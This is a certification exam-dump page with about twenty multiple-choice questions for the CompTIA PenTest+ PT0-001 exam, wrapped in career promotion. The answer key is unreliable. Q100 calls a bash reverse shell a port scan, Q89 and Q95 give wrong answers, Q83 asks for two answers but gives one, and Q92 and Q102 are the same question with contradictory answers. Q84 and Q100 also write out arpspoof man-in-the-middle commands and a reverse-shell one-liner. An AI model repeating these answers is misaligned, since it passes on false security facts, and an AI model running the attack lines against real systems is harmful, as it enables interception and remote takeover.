Pass Your CompTIA PenTest+ PT0-001 Exam on Jan 22, 2022 with 250 Questions [Q83-Q104]


PT0-001 Free Exam Study Guide! (Updated 250 Questions)


Job Roles Associated with CompTIA PT0-001 Exam

After passing the CompTIA PT0-001 exam, you become eligible for the PenTest+ certification. This certificate can help IT professionals accelerate their career growth by adding the knowledge and skills that many recruiters are looking for. The certification is very valuable in terms of employment opportunities, and there are several positions you will qualify for after obtaining it. Some of the job titles you can apply for include:

  • Vulnerability Assessment Analyst
  • Security Analyst
  • Network Security Operator
  • Vulnerability Tester
  • Penetration Tester

Getting the CompTIA PenTest+ certification also enables you to earn a better salary. The estimated average annual income for the professionals holding this certificate amounts to $97,000. With some level of experience and additional industry-recognized certifications, you can get paid even more.

 

NEW QUESTION 83
A company requested a penetration tester review the security of an in-house-developed Android application.
The penetration tester received an APK file to support the assessment. The penetration tester wants to run SAST on the APK file. Which of the following preparatory steps must the penetration tester do FIRST?
(Select TWO)

  • A. Re-sign the APK
  • B. Convert JAR files to DEX
  • C. Cross-compile the application
  • D. Convert to JAR
  • E. Decompile
  • F. Attach to ADB

Answer: E

 

NEW QUESTION 84
A malicious user wants to perform an MITM attack on a computer. The computer's network configuration is given below:
IP: 192.168.1.20
NETMASK: 255.255.255.0
DEFAULT GATEWAY: 192.168.1.254
DHCP: 192.168.1.253
DNS: 192.168.10.10, 192.168.20.10
Which of the following commands should the malicious user execute to perform the MITM attack?

  • A. arpspoof -r -t 192.168.1.253 192.168.1.20
  • B. arpspoof -t 192.168.1.20 192.168.1.254
  • C. arpspoof -c both -t 192.168.1.20 192.168.1.253
  • D. arpspoof -c both -r -t 192.168.1.1 192.168.1.20

Answer: C

 

NEW QUESTION 85
A penetration tester is required to perform OSINT on staff at a target company after completing the infrastructure aspect. Which of the following would be the BEST next step for the penetration tester?

  • A. Search the internet for information on staff such as social networking sites.
  • B. Visit the client and use impersonation to obtain information from staff.
  • C. Send spoofed emails to staff to see if staff will respond with sensitive information.
  • D. Obtain staff information by calling the company and using social engineering techniques.

Answer: A

Explanation/Reference: https://securitytrails.com/blog/what-is-osint-how-can-i-make-use-of-it

 

NEW QUESTION 86
When performing compliance-based assessments, which of the following is the MOST important key consideration?

  • A. Additional rate
  • B. Company policy
  • C. Industry type
  • D. Impact tolerance

Answer: B

 

NEW QUESTION 87
Which of the following commands would allow a penetration tester to access a private network from the Internet in Metasploit?

  • A. db_nmap -iL /tmp/privatehosts.txt
  • B. run autoroute -s 192.168.1.0/24
  • C. use auxiliary/server/socks4a
  • D. set rhost 192.168.1.10

Answer: D

Explanation/Reference: https://www.offensive-security.com/metasploit-unleashed/pivoting/

 

NEW QUESTION 88
At the beginning of a penetration test, the tester finds a file that includes employee data, such as email addresses, work phone numbers, computer names, and office locations. The file is hosted on a public web server. Which of the following BEST describes the technique that was used to obtain this information?

  • A. Enumeration of services
  • B. Social engineering
  • C. OSINT gathering
  • D. Port scanning

Answer: C


 

NEW QUESTION 89
A client is asking a penetration tester to evaluate a new web application for availability. Which of the following types of attacks should the tester use?

  • A. TCP SYN flood
  • B. SQL injection
  • C. XMAS scan
  • D. XSS

Answer: B

 

NEW QUESTION 90
A penetration tester is performing ARP spoofing against a switch. Which of the following should the penetration tester spoof to get the MOST information?

  • A. MAC address of the gateway
  • B. MAC address of the client
  • C. MAC address of the web server
  • D. MAC address of the domain controller

Answer: A

 

NEW QUESTION 91
A penetration tester reviews the scan results of a web application. Which of the following vulnerabilities is MOST critical and should be prioritized for exploitation?

  • A. Clickjacking
  • B. Stored XSS
  • C. Full path disclosure
  • D. Expired certificate

Answer: B

Reference: https://www.owasp.org/index.php/Top_10_2010-A2-Cross-Site_Scripting_(XSS)

 

NEW QUESTION 92
A company's corporate policies state that employees are able to scan any global network as long as it is done within working hours. Government laws prohibit unauthorized scanning. Which of the following should an employee abide by?

  • A. Laws supersede corporate policies
  • B. Industry standards regarding scanning should be followed
  • C. The employee must obtain written approval from the company's Chief Information Security Officer (CISO) prior to scanning
  • D. Company policies must be followed in this situation

Answer: A

 

NEW QUESTION 93
Instructions:
Analyze the code segments to determine which sections are needed to complete a port scanning script.
Drag the appropriate elements into the correct locations to complete the script.
If at any time you would like to bring back the initial state of the simulation, please click the reset all button.
During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.

Answer:


 

NEW QUESTION 94
Consumer-based IoT devices are often less secure than systems built for traditional desktop computers.
Which of the following BEST describes the reasoning for this?

  • A. Manufacturers developing IoT devices are less concerned with security.
  • B. It is difficult for administrators to implement the same security standards across the board.
  • C. Regulatory authorities often have lower security requirements for IoT systems.
  • D. IoT systems often lack the hardware power required by more secure solutions.

Answer: A

 

NEW QUESTION 95
Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow?

  • A. Stack pointer register
  • B. Stack base pointer
  • C. Destination index register
  • D. Index pointer register

Answer: A

 

NEW QUESTION 96
A penetration tester has been asked to conduct OS fingerprinting with Nmap using a company-provided text file that contains a list of IP addresses. Which of the following are needed to conduct this scan? (Choose two.)

  • A. -V
  • B. -sS
  • C. -O
  • D. -oN
  • E. -iL
  • F. -oX

Answer: D,E

Reference: https://securitytrails.com/blog/top-15-nmap-commands-to-scan-remote-hosts#six-scan-hosts-and-ip-addresses-re

 

NEW QUESTION 97
During a penetration test, a tester identifies traditional antivirus running on the exploited server. Which of the following techniques would BEST ensure persistence in a post-exploitation phase?

  • A. Modified daemons
  • B. Shell binary placed in C:\windows\temp
  • C. Backdoored executables
  • D. New user creation

Answer: A

 

NEW QUESTION 98
A client has requested an external network penetration test for compliance purposes. During discussion between the client and the penetration tester, the client expresses unwillingness to add the penetration tester's source IP addresses to the client's IPS whitelist for the duration of the test. Which of the following is the BEST argument as to why the penetration tester's source IP addresses should be whitelisted?

  • A. Penetration testing of third-party IPS systems often requires additional documentation and authorizations; potentially delaying the time-sensitive test.
  • B. Whitelisting prevents a possible inadvertent DoS attack against the IPS and supporting log-monitoring systems.
  • C. IPS whitelisting rules require frequent updates to stay current, constantly developing vulnerabilities and newly discovered weaknesses.
  • D. Testing should focus on the discovery of possible security issues across all in-scope systems, not on determining the relative effectiveness of active defenses such as an IPS.

Answer: D


 

NEW QUESTION 99
Which of the following is an example of a spear phishing attack?

  • A. Targeting an organization with a watering hole attack
  • B. Targeting an executive with an SMS attack
  • C. Targeting a specific team with an email attack
  • D. Targeting random users with a USB key drop

Answer: B

 

NEW QUESTION 100
The following line was found in an exploited machine's history file, showing a command the attacker ran:
bash -i >& /dev/tcp/192.168.0.1/80 0>&1
Which of the following describes what the command does?

  • A. Grabs the web server's banner.
  • B. Performs a port scan.
  • C. Redirects a TTY to a remote system.
  • D. Removes error logs for the supplied IP.

Answer: B

Explanation/Reference: https://hackernoon.com/reverse-shell-cf154dfee6bd

 

NEW QUESTION 101
A security consultant is trying to attack a device with a previously identified user account. Which of the following types of attacks is being executed?

  • A. Credential dump attack
  • B. Reverse shell attack
  • C. DLL injection attack
  • D. Pass the hash attack

Answer: D

 

NEW QUESTION 102
A company's corporate policies state that employees are able to scan any global network as long as it is done within working hours. Government laws prohibit unauthorized scanning. Which of the following should an employee abide by?

  • A. Industry standards regarding scanning should be followed.
  • B. The employee must obtain written approval from the company's Chief Information Security Officer (CISO) prior to scanning.
  • C. Company policies must be followed in this situation.
  • D. Laws supersede corporate policies.

Answer: B

 

NEW QUESTION 103
Which of the following situations would cause a penetration tester to communicate with a system owner/client during the course of a test? (Select TWO)

  • A. The tester discovers personally identifiable data on the system
  • B. The system becomes unavailable following an attempted exploit
  • C. The system shows a lack of hardening throughout
  • D. The system shows evidence of prior unauthorized compromise
  • E. The tester discovers a finding on an out-of-scope system

Answer: D,E

 

NEW QUESTION 104
......


Conclusion

Cybersecurity professionals are in constant demand because of the increasing number of data breaches and cyber-attacks. The CompTIA PenTest+ accreditation is a valuable credential that makes one a recognized IT security tester with knowledge and skills in finding weaknesses, handling assessments, and evaluating an organization's security setup before suggesting protective and preventive measures. Prepare for the PT0-001 certification exam with the above-mentioned resources, pass it, and get ready to boost your career.

 

PT0-001 Dumps for CompTIA PenTest+ Certified Exam Questions & Answer: https://www.latestcram.com/PT0-001-exam-cram-questions.html